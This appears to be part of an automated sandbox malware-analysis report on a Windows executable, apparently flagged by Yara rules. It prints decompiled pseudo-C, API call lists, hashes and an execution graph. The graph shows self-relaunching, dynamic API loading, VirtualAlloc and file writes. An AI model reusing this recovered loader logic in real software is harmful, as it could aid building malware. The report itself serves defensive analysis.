                  • Instruction Fuzzy Hash: CFE0C271601630ABC721BFB5D90539E75B0AF5871AF00841FF4808A181DF7C8990879D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 60%
                  			E0041F4A6(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                  				signed int _v8;
                  				void* _t31;
                  				intOrPtr _t32;
                  				signed int _t38;
                  				struct _CRITICAL_SECTION* _t39;
                  				intOrPtr* _t44;
                  				long* _t47;
                  				intOrPtr* _t50;
                  
                  				_push(__ecx);
                  				_t50 = _a4;
                  				_t38 = 1;
                  				_t47 = __ecx;
                  				_v8 = 1;
                  				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
                  					L10:
                  					_t39 =  &(_t47[7]);
                  					EnterCriticalSection(_t39);
                  					E0041F126( &(_t47[5]), _t50);
                  					LeaveCriticalSection(_t39);
                  					LocalFree( *(_t50 + 0xc));
                  					 *((intOrPtr*)( *_t50))(1);
                  					_t31 = TlsSetValue( *_t47, 0);
                  					L11:
                  					return _t31;
                  				} else {
                  					goto L1;
                  				}
                  				do {
                  					L1:
                  					_t32 = _a8;
                  					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
                  						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
                  						if(_t44 != 0) {
                  							 *((intOrPtr*)( *_t44))(1);
                  						}
                  						_t31 =  *(_t50 + 0xc);
                  						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
                  					} else {
                  						_t31 =  *(_t50 + 0xc);
                  						if( *(_t31 + _t38 * 4) != 0) {
                  							_v8 = _v8 & 0x00000000;
                  						}
                  					}
                  					_t38 = _t38 + 1;
                  				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
                  				if(_v8 == 0) {
                  					goto L11;
                  				}
                  				goto L10;
                  			}












                  APIs
                  • EnterCriticalSection.KERNEL32(?), ref: 0041F505
                  • LeaveCriticalSection.KERNEL32(?,?), ref: 0041F515
                  • LocalFree.KERNEL32(?), ref: 0041F51E
                  • TlsSetValue.KERNEL32(?,00000000), ref: 0041F530
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                  • String ID:
                  • API String ID: 2949335588-0
                  • Opcode ID: 07886f9ab1872a406ab614c5873ea6e2d331d229a115a4cc32334d960cf05743
                  • Instruction ID: baa2f62964a8d9cda5b59eae2555c50a908fe22ae5862753cb71ba2bb861ffbd
                  • Opcode Fuzzy Hash: 07886f9ab1872a406ab614c5873ea6e2d331d229a115a4cc32334d960cf05743
                  • Instruction Fuzzy Hash: FF119731600205EFC720CF58C884F9AB3B4FF55315F20846EF546876A2CB79A896CB15
                  Uniqueness

                  Uniqueness Score: 0.25%

                  C-Code - Quality: 100%
                  			E00420C0D(signed int _a4) {
                  				void* __ebp;
                  				struct _CRITICAL_SECTION* _t4;
                  				void* _t8;
                  				signed int _t9;
                  				intOrPtr* _t12;
                  
                  				_t9 = _a4;
                  				if(_t9 >= 0x11) {
                  					_t4 = E00413DD0(_t8);
                  				}
                  				if( *0x44fa14 == 0) {
                  					_t4 = E00420BA4();
                  				}
                  				_t12 = 0x44fbc8 + _t9 * 4;
                  				if( *_t12 == 0) {
                  					EnterCriticalSection(0x44fbb0);
                  					if( *_t12 == 0) {
                  						_t4 = 0x44fa18 + _t9 * 0x18;
                  						InitializeCriticalSection(_t4);
                  						 *_t12 =  *_t12 + 1;
                  					}
                  					LeaveCriticalSection(0x44fbb0);
                  				}
                  				EnterCriticalSection(0x44fa18 + _t9 * 0x18);
                  				return _t4;
                  			}









                  APIs
                  • EnterCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C47
                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C59
                  • LeaveCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C66
                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C76
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                  • String ID:
                  • API String ID: 3253506028-0
                  • Opcode ID: 832e1dd5d181bce55d1726a51741fa646c0df18bbef569af2e81ac0c40002f5d
                  • Instruction ID: 726fd355699d83bf9c671ec753497349cc40ea0b43e5465d5b206dd9d658a255
                  • Opcode Fuzzy Hash: 832e1dd5d181bce55d1726a51741fa646c0df18bbef569af2e81ac0c40002f5d
                  • Instruction Fuzzy Hash: 0EF04673B001245FDB209B56FD88727B7A9EBE2356F511037F48452253C738A880C6AE
                  Uniqueness

                  Uniqueness Score: 0.22%

                  C-Code - Quality: 100%
                  			E0041F009(long* __ecx, signed int _a4) {
                  				void* _t9;
                  				struct _CRITICAL_SECTION* _t12;
                  				signed int _t14;
                  				long* _t16;
                  
                  				_t16 = __ecx;
                  				_t1 =  &(_t16[7]); // 0x44f9d8
                  				_t12 = _t1;
                  				EnterCriticalSection(_t12);
                  				_t14 = _a4;
                  				if(_t14 <= 0) {
                  					L5:
                  					LeaveCriticalSection(_t12);
                  					return 0;
                  				}
                  				_t3 =  &(_t16[3]); // 0x3
                  				if(_t14 >=  *_t3) {
                  					goto L5;
                  				}
                  				_t9 = TlsGetValue( *_t16);
                  				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                  					goto L5;
                  				} else {
                  					LeaveCriticalSection(_t12);
                  					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                  				}
                  			}








                  APIs
                  • EnterCriticalSection.KERNEL32(0044F9D8,?,?,?,?,0041F600,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F017
                  • TlsGetValue.KERNEL32(0044F9BC,?,?,?,?,0041F600,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F02B
                  • LeaveCriticalSection.KERNEL32(0044F9D8,?,?,?,?,0041F600,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F041
                  • LeaveCriticalSection.KERNEL32(0044F9D8,?,?,?,?,0041F600,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F04C
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalSection$Leave$EnterValue
                  • String ID:
                  • API String ID: 3969253408-0
                  • Opcode ID: 06bc84e5ea9d556fbb0cc2e9183b6dda3bb31e761f301a2a15e135e5e8b5964b
                  • Instruction ID: aee2dc97dfc1ab292c8d8f421becaba72ae4a631ad10b94ea4477e52f24ac0d1
                  • Opcode Fuzzy Hash: 06bc84e5ea9d556fbb0cc2e9183b6dda3bb31e761f301a2a15e135e5e8b5964b
                  • Instruction Fuzzy Hash: 0BF0B4762405009FC7204F25DC88C977BADEA8836031A4476F84283223D639F84A8A96
                  Uniqueness

                  Uniqueness Score: 0.21%

                  Execution Graph

                  Execution Coverage:8.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:6%
                  Total number of Nodes:448
                  Total number of Limit Nodes:2

                  Graph

401a52 GetProcessHeap 3199->3200 3201 405fce 3200->3201 3297 405f15 lstrlenW GetTickCount 3201->3297 3203 405fd9 3204 401a52 GetProcessHeap 3203->3204 3205 405fef 3204->3205 3206 4014f2 GetProcessHeap 3205->3206 3207 40602a 3206->3207 3208 4060a8 3207->3208 3209 40603e GetTickCount 3207->3209 3208->3115 3216 40140a 3208->3216 3210 40605a 3209->3210 3211 4014f2 GetProcessHeap 3210->3211 3212 406064 3211->3212 3214 406079 3212->3214 3299 401e27 GetTickCount 3212->3299 3301 401532 GetProcessHeap HeapFree 3214->3301 3302 401345 3216->3302 3219 4014e9 3219->3115 3225 40215a 3219->3225 3221 401a52 GetProcessHeap 3223 401467 3221->3223 3222 4014c4 3312 401532 GetProcessHeap HeapFree 3222->3312 3223->3222 3306 401383 3223->3306 3226 40217a 3225->3226 3229 402173 3225->3229 3227 4014f2 GetProcessHeap 3226->3227 3226->3229 3230 40219e 3227->3230 3229->3121 3229->3123 3231 405ed3 3229->3231 3230->3229 3320 401532 GetProcessHeap HeapFree 3230->3320 3232 4014f2 GetProcessHeap 3231->3232 3233 405eea 3232->3233 3237 405f0a 3233->3237 3321 402a73 memset 3233->3321 3235 405efd 3235->3237 3325 401532 GetProcessHeap HeapFree 3235->3325 3237->3123 3238->3121 3239->3115 3240->3109 3241->3105 3242->3102 3247 402727 memset 3243->3247 3245 4027b6 3245->3186 3246 401532 GetProcessHeap HeapFree 3245->3246 3246->3186 3248 402759 3247->3248 3252 402752 3247->3252 3253 402594 3248->3253 3252->3245 3260 4025a0 3253->3260 3255 40259c 3255->3252 3256 402629 3255->3256 3257 40263c 3256->3257 3258 402653 3256->3258 3257->3258 3269 4047dd 3257->3269 3258->3252 3261 4025aa 3260->3261 3263 4025b9 3261->3263 3264 40499d 3261->3264 3263->3255 3265 404a03 3264->3265 3266 4049ed memset 3264->3266 3267 404a87 memset 3265->3267 3268 404a9d memset memset 3265->3268 3266->3265 3267->3268 3268->3263 3270 4047ee 3269->3270 3272 404808 3269->3272 3270->3257 3271 4048f4 3284 40436d 3271->3284 3272->3270 3272->3271 3274 4048e1 3272->3274 3280 403e46 3274->3280 3276 4048e8 3276->3270 3288 4037a9 3276->3288 3279 
404952 memset memset 3279->3270 3282 403e86 3280->3282 3281 404271 3281->3276 3282->3281 3283 4037a9 8 API calls 3282->3283 3283->3282 3286 404395 3284->3286 3285 40473a 3285->3276 3286->3285 3287 4037a9 8 API calls 3286->3287 3287->3285 3289 4037c7 3288->3289 3290 40378e 6 API calls 3289->3290 3291 4038ff 3289->3291 3290->3291 3292 40378e 6 API calls 3291->3292 3295 40392e memset memset 3291->3295 3292->3295 3294 403bd4 3294->3270 3294->3279 3295->3294 3296->3196 3298 405f3d 3297->3298 3298->3203 3300 401e44 3299->3300 3300->3214 3301->3208 3303 401368 3302->3303 3304 401379 3303->3304 3313 4023e5 MultiByteToWideChar 3303->3313 3304->3221 3304->3222 3307 40139b 3306->3307 3308 4014f2 GetProcessHeap 3307->3308 3310 4013e7 3307->3310 3309 4013b0 3308->3309 3309->3310 3319 401532 GetProcessHeap HeapFree 3309->3319 3310->3222 3312->3219 3314 402401 3313->3314 3315 40241e 3313->3315 3316 4014f2 GetProcessHeap 3314->3316 3315->3304 3317 402409 3316->3317 3317->3315 3318 40240f MultiByteToWideChar 3317->3318 3318->3315 3319->3310 3320->3229 3322 402aa5 3321->3322 3324 402a9e 3321->3324 3322->3324 3326 40284f 3322->3326 3324->3235 3325->3237 3327 402865 3326->3327 3331 40289b 3326->3331 3328 4028af 3327->3328 3327->3331 3332 402917 3327->3332 3333 404ad4 3328->3333 3330 404ad4 6 API calls 3330->3332 3331->3324 3332->3330 3332->3331 3339 404b19 _memset 3333->3339 3334 404e76 memset 3334->3339 3335 404e04 memset 3335->3339 3336 404bd9 3336->3331 3337 404f66 memset memset memset 3337->3339 3338 40533d memset 3338->3339 3339->3334 3339->3335 3339->3336 3339->3337 3339->3338 3346 401e8f GetTickCount 3340->3346 3342 40f8bd 3343 40f8e6 CreateFileW 3342->3343 3344 40f926 3343->3344 3345 40f90d WriteFile CloseHandle 3343->3345 3344->3140 3344->3141 3345->3344 3347 401eb0 3346->3347 3347->3342 3378 401855 3348->3378 3350 40fc5c 3350->3147 3351 40fc2d 3351->3350 3352 40fc43 CreateThread 3351->3352 3352->3350 3391 40fb06 3352->3391 3393 40faa1 3353->3393 3356 40f8e6 3 API calls 3357 
40fb9d 3356->3357 3358 40fc18 3357->3358 3397 401dcb WTSGetActiveConsoleSessionId 3357->3397 3358->3147 3361 401a52 GetProcessHeap 3362 40fbbd 3361->3362 3401 401d2b 3362->3401 3364 40fbf6 3365 40fbfd CloseHandle CloseHandle 3364->3365 3366 40fc0f CloseHandle 3364->3366 3365->3366 3366->3358 3368 40faa1 3 API calls 3367->3368 3369 40fb46 3368->3369 3370 40f8e6 3 API calls 3369->3370 3371 40fb56 3370->3371 3372 40fb6c 3371->3372 3373 401cc2 3 API calls 3371->3373 3372->3147 3373->3372 3375 40cab7 3374->3375 3376 40cac5 3375->3376 3406 40ca23 3375->3406 3376->3147 3379 401866 3378->3379 3380 401873 VirtualAlloc 3379->3380 3381 401922 3379->3381 3380->3381 3382 401890 3380->3382 3381->3351 3386 40179c 3382->3386 3385 401913 VirtualFree 3385->3381 3387 401819 3386->3387 3389 4017b0 3386->3389 3387->3381 3387->3385 3388 4017be LoadLibraryA 3388->3387 3388->3389 3389->3387 3389->3388 3390 4017ea GetProcAddress 3389->3390 3390->3387 3390->3389 3392 40fb17 3391->3392 3394 40fab4 lstrlenW GetTickCount 3393->3394 3395 401e8f GetTickCount 3394->3395 3396 40fadd 3395->3396 3396->3356 3398 401de3 3397->3398 3399 401dfc 3398->3399 3400 401df3 CloseHandle 3398->3400 3399->3358 3399->3361 3400->3399 3402 401503 memset 3401->3402 3403 401d48 3402->3403 3404 401d61 3403->3404 3405 401a52 GetProcessHeap 3403->3405 3404->3364 3405->3404 3407 401503 memset 3406->3407 3408 40ca39 3407->3408 3408->3376 3410 401503 memset 3409->3410 3411 402009 3410->3411 3414 401f75 3411->3414 3416 401f94 3414->3416 3415 401fe6 3415->2957 3416->3415 3417 401fd7 LocalFree 3416->3417 3417->3415 3419 401503 memset 3418->3419 3420 40f15e GetModuleFileNameW 3419->3420 3420->3053 3422 401a52 GetProcessHeap 3421->3422 3423 40f27c 3422->3423 3426 40f190 lstrlenW 3423->3426 3427 40f1b4 3426->3427 3430 40fc67 3432 40fc78 3430->3432 3434 40fcd4 3430->3434 3431 40fc90 WaitForSingleObject 3431->3432 3432->3431 3432->3434 3437 40192a VirtualFree 3432->3437 3438 401532 GetProcessHeap HeapFree 3432->3438 3436 40fcaf 
CloseHandle 3436->3432 3437->3436 3438->3432 3439 40ff28 IsProcessorFeaturePresent 3440 40ff4e 3439->3440 3441 405a5d 3446 404d56 _memset 3441->3446 3442 405a6b 3442->3442 3443 404e04 memset 3443->3446 3444 404e76 memset 3444->3446 3445 404f66 memset memset memset 3445->3446 3446->3442 3446->3443 3446->3444 3446->3445 3447 40533d memset 3446->3447 3447->3446 3448 40257d GetProcessHeap HeapFree

                  Executed Functions

                  Control-flow Graph

                  C-Code - Quality: 91%
                  			_entry_() {
                  				char _v20;
                  				short _v540;
                  				short _v1060;
                  				void* _t15;
                  				int _t21;
                  				WCHAR* _t25;
                  				void* _t38;
                  				WCHAR* _t39;
                  				WCHAR* _t43;
                  
                  				E0040CACE();
                  				E0040DB84();
                  				GetModuleFileNameW(0,  &_v1060, 0x104);
                  				_t15 = E00401144( &_v1060);
                  				_t38 = E00401A52(0x4129a0, 0x72fc3a35);
                  				 *0x4143a4( &_v540, 0x104, _t38, _t15);
                  				_t32 = _t38;
                  				L00401B09(_t38);
                  				_t39 = GetCommandLineW();
                  				_t21 = lstrlenW(_t39);
                  				_t43 =  &(_t39[_t21 - lstrlenW( &_v540)]);
                  				while(_t39 <= _t43) {
                  					_t25 = lstrcmpiW(_t39,  &_v540); // executed
                  					__eflags = _t25;
                  					if(__eflags != 0) {
                  						_t39 =  &(_t39[1]);
                  						__eflags = _t39;
                  						continue;
                  					}
                  					E0040C84E(0x104, _t32, _t39, __eflags);
                  					ExitProcess(0);
                  				}
                  				E00401CC2( &_v1060,  &_v540, _t32,  &_v20); // executed
                  				ExitProcess(0);
                  			}

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F097
                  • _snwprintf.NTDLL ref: 0040F0C5
                  • GetCommandLineW.KERNEL32 ref: 0040F0D5
                  • lstrlenW.KERNEL32(00000000), ref: 0040F0DE
                  • lstrlenW.KERNEL32(?), ref: 0040F0ED
                  • lstrcmpiW.KERNELBASE(00000000,?), ref: 0040F102
                  • ExitProcess.KERNEL32 ref: 0040F113
                    • Part of subcall function 00401CC2: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • ExitProcess.KERNEL32 ref: 0040F13A
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleName_snwprintflstrcmpi
                  • String ID: g8Cw
                  • API String ID: 4243820956-3103284439
                  • Opcode ID: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction ID: 96f63cbf6c12603b9eafb981d3b8471d0b236fe68b2e75c18f179b1aecd08856
                  • Opcode Fuzzy Hash: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction Fuzzy Hash: 5F118472600118ABD710AB65DC89AFF377CEB40349F00417AF505A7192EE346E458BA9
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 21 401cc2-401cfa call 401503 25 401d23 21->25 26 401cfc-401d01 21->26 29 401d25-401d2a 25->29 27 401d03-401d09 26->27 28 401d0f-401d21 CloseHandle * 2 26->28 30 401d0a-401d0d 27->30 28->30 30->29
                  C-Code - Quality: 64%
                  			E00401CC2(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a8) {
                  				struct _PROCESS_INFORMATION _v20;
                  				struct _STARTUPINFOW _v88;
                  				int _t13;
                  				void* _t22;
                  
                  				_t22 = 0x44;
                  				E00401503( &_v88, _t22);
                  				_v88.cb = 0x44;
                  				_t13 = CreateProcessW(__ecx, __edx, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
                  				if(_t13 == 0) {
                  					return 0;
                  				}
                  				if(_a8 == 0) {
                  					CloseHandle(_v20);
                  					CloseHandle(_v20.hThread);
                  				} else {
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  				}
                  				return 1;
                  			}

                  APIs
                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • CloseHandle.KERNEL32(?), ref: 00401D12
                  • CloseHandle.KERNEL32(0040F136), ref: 00401D1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D$M vu
                  • API String ID: 2922976086-427032030
                  • Opcode ID: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction ID: 78a74d64e74da198333939fe1c260d8d1ae2390c954a34ff9c8bd1b4990b218a
                  • Opcode Fuzzy Hash: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction Fuzzy Hash: D7F0A472900108ABDB12DFA5DC04AEFB7BDEF45712B108036F916F71A0EB78AD058694
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Non-executed Functions

                  C-Code - Quality: 99%
                  			E00404AD4(int* __ecx, void* __edx, signed int _a4, intOrPtr _a8, signed char* _a12, signed int* _a16, signed int _a20) {
                  				signed int _v8;
                  				signed int _v12;
                  				void* _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				signed int _v28;
                  				void* _v32;
                  				void* _v36;
                  				signed int _v40;
                  				signed int _v44;
                  				signed int _v48;
                  				signed int _v52;
                  				signed char _v56;
                  				intOrPtr _v60;
                  				int* _v64;
                  				signed int _v68;
                  				int _v72;
                  				void* _v76;
                  				intOrPtr _v80;
                  				signed int _v144;
                  				signed int _v148;
                  				void _v212;
                  				signed int _t759;
                  				signed int* _t763;
                  				void* _t764;
                  				signed int _t769;
                  				signed int _t770;
                  				intOrPtr _t771;
                  				int _t772;
                  				signed int _t774;
                  				void* _t775;
                  				signed int _t782;
                  				void* _t785;
                  				signed int* _t786;
                  				void* _t792;
                  				intOrPtr _t795;
                  				signed char* _t813;
                  				intOrPtr _t815;
                  				void* _t816;
                  				signed int _t819;
                  				intOrPtr _t822;
                  				signed int _t823;
                  				signed int _t828;
                  				signed int _t830;
                  				signed int _t834;
                  				unsigned int _t836;
                  				signed int _t837;
                  				signed int _t841;
                  				unsigned int _t843;
                  				signed int _t846;
                  				signed int _t849;
                  				unsigned int _t850;
                  				signed int _t852;
                  				signed char _t853;
                  				signed int _t855;
                  				signed int _t864;
                  				signed int _t865;
                  				signed int _t868;
                  				signed int _t872;
                  				signed int _t873;
                  				signed int _t874;
                  				void* _t875;
                  				signed int _t879;
                  				signed int _t883;
                  				signed int _t884;
                  				signed int _t885;
                  				signed int _t889;
                  				char _t890;
                  				signed int _t894;
                  				signed int _t900;
                  				signed int _t902;
                  				signed char _t908;
                  				signed int _t910;
                  				signed int _t913;
                  				signed int _t915;
                  				signed int _t919;
                  				signed int _t920;
                  				signed int _t922;
                  				signed int _t926;
                  				signed int _t934;
                  				intOrPtr _t937;
                  				signed int _t939;
                  				signed int _t941;
                  				signed int _t948;
                  				signed int _t960;
                  				signed int _t962;
                  				signed char _t968;
                  				signed int _t970;
                  				signed int _t972;
                  				intOrPtr _t988;
                  				signed int _t989;
                  				void* _t999;
                  				signed int _t1004;
                  				signed int _t1008;
                  				signed int _t1009;
                  				signed int _t1011;
                  				signed int _t1014;
                  				signed int _t1019;
                  				signed int _t1029;
                  				signed int _t1031;
                  				signed char _t1037;
                  				signed int _t1039;
                  				signed int _t1041;
                  				signed int _t1044;
                  				signed int _t1046;
                  				signed int _t1051;
                  				signed int _t1060;
                  				signed int _t1066;
                  				int _t1067;
                  				signed int _t1075;
                  				signed int _t1077;
                  				signed int _t1078;
                  				signed int _t1079;
                  				signed int _t1080;
                  				signed int _t1082;
                  				signed int _t1083;
                  				signed int _t1084;
                  				signed int _t1085;
                  				signed int _t1087;
                  				signed int _t1088;
                  				signed int _t1090;
                  				signed int _t1091;
                  				signed int _t1093;
                  				signed int _t1094;
                  				signed int _t1095;
                  				signed int _t1096;
                  				signed int _t1112;
                  				signed int _t1113;
                  				void* _t1114;
                  				intOrPtr _t1115;
                  				signed char* _t1116;
                  				signed int _t1117;
                  				signed int _t1118;
                  				signed int _t1119;
                  				signed int _t1121;
                  				signed int _t1123;
                  				signed int _t1124;
                  				signed int _t1126;
                  				signed int _t1127;
                  				signed char _t1128;
                  				signed int _t1135;
                  				signed int _t1137;
                  				signed int _t1138;
                  				signed int* _t1139;
                  				signed int _t1141;
                  				unsigned int _t1145;
                  				signed int _t1146;
                  				void* _t1157;
                  				void* _t1158;
                  				signed char _t1161;
                  				signed int _t1163;
                  				void* _t1164;
                  				signed int _t1165;
                  				signed int _t1166;
                  				signed char _t1169;
                  				unsigned int _t1170;
                  				signed char _t1176;
                  				signed int _t1177;
                  				signed int _t1185;
                  				signed int* _t1187;
                  				signed int _t1191;
                  				signed char _t1194;
                  				signed int _t1195;
                  				void* _t1197;
                  				signed int _t1198;
                  				signed int _t1199;
                  				signed char _t1200;
                  				signed int _t1201;
                  				signed int _t1202;
                  				signed char _t1203;
                  				int _t1205;
                  				intOrPtr* _t1208;
                  				signed char _t1216;
                  				signed int _t1219;
                  				signed int* _t1221;
                  				signed int _t1222;
                  				signed char _t1229;
                  				signed int _t1232;
                  				signed char _t1233;
                  				signed char _t1234;
                  				void* _t1239;
                  				void* _t1244;
                  				intOrPtr _t1245;
                  				signed int _t1247;
                  				signed int _t1248;
                  				signed int _t1249;
                  				signed int _t1250;
                  				signed char _t1251;
                  				int _t1253;
                  				signed int _t1256;
                  				signed char _t1263;
                  				signed int _t1266;
                  				signed int _t1267;
                  				signed char _t1270;
                  				signed char _t1271;
                  				signed int _t1274;
                  				void* _t1275;
                  				signed int _t1277;
                  				signed int _t1279;
                  				void* _t1288;
                  				signed int _t1291;
                  				void* _t1296;
                  				signed int _t1299;
                  				signed int _t1301;
                  				int* _t1302;
                  				unsigned int _t1303;
                  				signed int _t1304;
                  				void* _t1305;
                  				int _t1310;
                  				signed int _t1315;
                  				signed int _t1317;
                  				signed int _t1320;
                  				unsigned int _t1321;
                  				char* _t1322;
                  				signed int _t1326;
                  				int* _t1350;
                  				signed int _t1351;
                  				signed int* _t1352;
                  				signed int _t1355;
                  				signed int _t1358;
                  				intOrPtr _t1359;
                  				void* _t1363;
                  				signed int _t1364;
                  				signed int _t1365;
                  				void* _t1366;
                  				void* _t1367;
                  				void* _t1368;
                  				void* _t1369;
                  				void* _t1370;
                  				void* _t1371;
                  				void* _t1372;
                  				signed int _t1373;
                  				int _t1374;
                  				signed int _t1375;
                  				int* _t1376;
                  				void* _t1377;
                  				void* _t1378;
                  				void* _t1379;
                  				void* _t1384;
                  				void* _t1385;
                  
                  				_t1288 = __edx;
                  				_v16 = __edx;
                  				_t1113 = _t1112 | 0xffffffff;
                  				_v76 = __edx;
                  				_t1363 = _a12;
                  				_v36 =  *_a4 + __edx;
                  				_t1350 = __ecx;
                  				_v20 = _t1113;
                  				_v64 = __ecx;
                  				_t759 =  *_a16;
                  				_v32 = _t1363;
                  				_v60 = _t759 + _t1363;
                  				_t1135 = _a20 & 0x00000004;
                  				_v52 = _t1135;
                  				if(_t1135 == 0) {
                  					_t16 = _t1363 - 1; // 0x7
                  					_t1137 = _t16 + _t759 - _a8;
                  					__eflags = _t1137;
                  					_v68 = _t1137;
                  				} else {
                  					_t1137 = _t1113;
                  					_v68 = _t1113;
                  				}
                  				_t18 = _t1137 + 1; // 0x8
                  				if((_t1137 & _t18) != 0 || _t1363 < _a8) {
                  					 *_a16 =  *_a16 & 0x00000000;
                  					_t763 = _a4;
                  					 *_t763 =  *_t763 & 0x00000000;
                  					__eflags =  *_t763;
                  					_t764 = 0xfffffffd;
                  					return _t764;
                  				} else {
                  					_v28 = _v28 & 0x00000000;
                  					_t1364 = _t1350[1];
                  					_t1138 = _t1350[9];
                  					_v8 = _t1350[0xe];
                  					_v44 = _t1350[8];
                  					_v56 = _t1350[0xa];
                  					_v72 = _t1350[0xf];
                  					_t769 =  *_t1350;
                  					_v48 = _t1364;
                  					_v12 = _t1138;
                  					_v24 = 1;
                  					_v80 = 0x90;
                  					_t1384 = _t769 - 0x18;
                  					if(_t1384 > 0) {
                  						__eflags = _t769 - 0x25;
                  						if(__eflags > 0) {
                  							_t770 = _t769 - 0x26;
                  							__eflags = _t770;
                  							if(_t770 == 0) {
                  								_t1139 = _v32;
                  								_t771 = _v60;
                  								L59:
                  								__eflags = _t1288 - _v36;
                  								if(_t1288 >= _v36) {
                  									 *_t1350 = 0x26;
                  									L335:
                  									_t772 = _v24;
                  									L336:
                  									_t1114 = 0xfffffffc;
                  									_t1113 =  !=  ? _t772 : _t1114;
                  									L337:
                  									_v20 = _t1113;
                  									if(_t1113 == _t772 || _t1113 == 0xfffffffc) {
                  										L343:
                  										_t1350[1] = _t1364;
                  										asm("bts ecx, esi");
                  										_t774 =  >=  ? 0 : 0;
                  										_t1141 = 0 ^ _t774;
                  										_t775 =  >=  ? _t1141 : _t774;
                  										_t1350[8] = _v44;
                  										_t1350[9] = _v12;
